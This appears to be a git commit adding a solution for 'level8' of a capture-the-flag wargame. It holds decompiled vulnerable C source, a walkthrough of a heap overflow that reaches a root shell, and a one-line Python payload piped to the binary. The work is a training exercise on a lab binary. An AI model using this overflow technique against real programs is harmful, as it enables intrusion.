level8: done
This commit is contained in:
0x35c
parent
a8ff8f0105
commit
50afa069df
1
level8/ressources/exploit
Normal file
1
level8/ressources/exploit
Normal file
@ -0,0 +1 @@
|
|||||||
|
(python -c 'print "auth \nservice" + "A" * 34 + "\n" + "login\n"'; cat) | ./level8
|
||||||
36
level8/source.c
Normal file
36
level8/source.c
Normal file
@ -0,0 +1,36 @@
|
|||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
char *auth;
|
||||||
|
int service;
|
||||||
|
|
||||||
|
int main(void)
|
||||||
|
{
|
||||||
|
char s[5];
|
||||||
|
char v5[2];
|
||||||
|
char v6[129];
|
||||||
|
|
||||||
|
while (1) {
|
||||||
|
printf("%p, %p \n", auth, (const void *)service);
|
||||||
|
if (!fgets(s, 128, stdin))
|
||||||
|
break;
|
||||||
|
if (!memcmp(s, "auth ", 5)) {
|
||||||
|
auth = (char *)malloc(4);
|
||||||
|
auth[0] = 0;
|
||||||
|
if (strlen(v5) <= 30)
|
||||||
|
strcpy(auth, v5);
|
||||||
|
}
|
||||||
|
if (!memcmp(s, "reset", 5))
|
||||||
|
free(auth);
|
||||||
|
if (!memcmp(s, "service", 6))
|
||||||
|
service = (int)strdup(v6);
|
||||||
|
if (!memcmp(s, "login", 5)) {
|
||||||
|
if (auth[32])
|
||||||
|
system("/bin/sh");
|
||||||
|
else
|
||||||
|
fwrite("Password:\n", 1, 10, stdout);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
13
level8/walkthrough
Normal file
13
level8/walkthrough
Normal file
@ -0,0 +1,13 @@
|
|||||||
|
# Level8
|
||||||
|
|
||||||
|
Using ghidra, we can decompile the code and see that it loops on a `fgets()` and does a bunch of `memcmp()` with its buffer.
|
||||||
|
First of all, we have 2 global variables, `char *auth` and `int service`. Also, we have 3 local buffers (`s`, `v5` and `v6`) with respective sizes of 5, 2 and 129.
|
||||||
|
We can see that they are being changed in 2 different `if memcmp()`.
|
||||||
|
The first one is when we input `"auth "`. It will allocate 4 bytes to `auth`, then set `auth[0]` to 0.
|
||||||
|
The second one is when we input `"service"`. It will `strdup()` the content of `v6` (a random buffer on the stack) to `service`. This is interesting because we can overflow the first buffer `s` (through `fgets(s, 128, stdin)`)until we reach `v6`, thus allowing us to write whatever we want to service. Since `service` is an int, it will overflow to the next variable, which is `char *auth`.
|
||||||
|
To make this vulnerability useful, let's see the last `memcmp()`.
|
||||||
|
This last `if memcmp()` is triggered with the input `"login"`. It then has an `if/else`, that will open a shell (what we want) in case `auth[32] != 0`.
|
||||||
|
Here comes the interesting part, remember we could overflow on `auth` through the `strdup` on `service`.
|
||||||
|
|
||||||
|
Here's the full exploit:
|
||||||
|
`(python -c 'print "auth \nservice" + "A" * 34 + "\n" + "login\n"'; cat) | ./level8`
|
||||||
Loading…
Reference in New Issue
Block a user